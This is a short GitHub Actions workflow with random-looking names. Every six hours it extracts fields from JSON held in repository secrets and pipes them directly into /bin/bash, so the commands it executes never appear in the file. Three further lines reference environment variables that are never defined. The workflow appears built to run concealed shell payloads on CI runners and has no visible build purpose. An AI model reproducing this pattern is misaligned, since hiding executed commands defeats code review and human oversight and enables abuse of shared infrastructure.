name: kuanghengj

on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kuanghengj
        env:
          wigco70: ${{ secrets.wigco70 }}
        run: |
          echo $wigco70 | jq -r .l45477 | /bin/bash
          echo $g086 | jq -r .a05300 | /bin/bash
          echo $yip468 | jq -r .qd6868 | /bin/bash
          echo $gm2898 | jq -r .nicg412 | /bin/bash

